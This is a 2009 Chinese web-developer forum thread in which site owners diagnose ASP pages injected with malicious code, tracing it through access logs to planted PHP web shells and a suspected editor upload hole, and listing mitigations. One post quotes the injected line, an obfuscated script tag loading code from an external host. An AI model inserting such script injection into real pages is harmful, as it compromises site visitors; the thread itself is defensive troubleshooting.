标题:asp文件被写入恶意代码问题
只看楼主
aspic
Rank: 17Rank: 17Rank: 17Rank: 17Rank: 17
等 级:贵宾
威 望:51
帖 子:2258
专家分:8050
注 册:2008-2-18
得分:0 
主要应该看POST吧 没分析过日志~
2009-10-21 10:00
aspic
Rank: 17Rank: 17Rank: 17Rank: 17Rank: 17
等 级:贵宾
威 望:51
帖 子:2258
专家分:8050
注 册:2008-2-18
得分:0 
04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001
2009-10-21 10:02
friends571
Rank: 2
等 级:论坛游民
帖 子:129
专家分:30
注 册:2009-3-3
得分:0 
sql注入代码应该添加了吧
还有就是互动部分,比如留言,提交图片之类,有没有过滤掉特殊字符
2009-10-21 10:47
aspic
Rank: 17Rank: 17Rank: 17Rank: 17Rank: 17
等 级:贵宾
威 望:51
帖 子:2258
专家分:8050
注 册:2008-2-18
得分:0 
sql注入代码还是sql防注入代码
2009-10-21 10:54
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
sql防注入加了。。问题是连inc.asp(防注入代码)也被写和了这个代码了。。

在QQ群里请教了。。hmhz版(多谢)。。暂时防了。。

关闭了FSO功能。。
关闭了空间PHP空间的支持(我被上传的是PHP木马)
删除了网站后台功能。。只保留前台能浏览的程序文件。。
甚至。。关闭了FTP空间。。。不能上传了。。知道密码也不行。。
切断了这些可利用资源了。。但愿明天不会有问题了。呵呵。。

谢谢各们位。。

学习编程www.
2009-10-21 11:59
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
以下是引用aspic在2009-10-21 10:02:01的发言:

04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001


你厉害。。我看了好久。。眼睛都快看得掉出来了。。都没看到这个。。

04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001
04:32:36 POST /html/anli.php 65.182.191.191 200 160 212

当时也忘了查找。。

就是这个日志了。。呵呵。。


学习编程www.
2009-10-21 12:27
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
但是即使找到了它。。我还是不太清楚漏洞在哪里?我想应该是eWebEditor这个html在线编辑器的上传漏洞了。。。

学习编程www.
2009-10-21 12:30
kgdipbyve
Rank: 2
等 级:论坛游民
帖 子:346
专家分:35
注 册:2008-5-4
得分:0 
有可能是服务商那边的服务器里有个电脑中了病之后,在那里传播。
我公司页面卡的很严重查看页面代码时发现了这个。电话甩到机房里。那边查到是其它机子中标的问题。
2009-10-23 10:30
wormit
Rank: 1
等 级:新手上路
帖 子:29
专家分:0
注 册:2006-5-23
得分:0 
是呀   我也遇到相似的问题   烦死了     
是在页面代码的最后加的    <script src=http://%75%72%62%61n%68%75b%2E%63%6E></script>
每次加上的形式是一样的      但里面的数字有所变动   

大哥哥  大姐姐   好妹妹们    帮帮忙吧
2009-10-23 15:07
chenguoxing517
Rank: 7Rank: 7Rank: 7
来 自:广东广州
等 级:黑侠
威 望:1
帖 子:154
专家分:619
注 册:2009-9-28
得分:0 
这个问题一般是你程序的漏洞造成的,而且一般都是上传漏洞,利用上传漏洞上传一个伪装的图片文件,其实是个木马文件,上传成功后,将该图片文件恢复为asp文件,这个文件一般就是黑你的人的登陆入口,利用这个文件可以访问到你整站上的所有文件列表,从而可以很方便的实现批量挂马等功能,现在的问题是,你得先找到这个文件,然后把你文件上传的漏洞堵上
2009-10-23 22:08



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-289207-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.333327 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved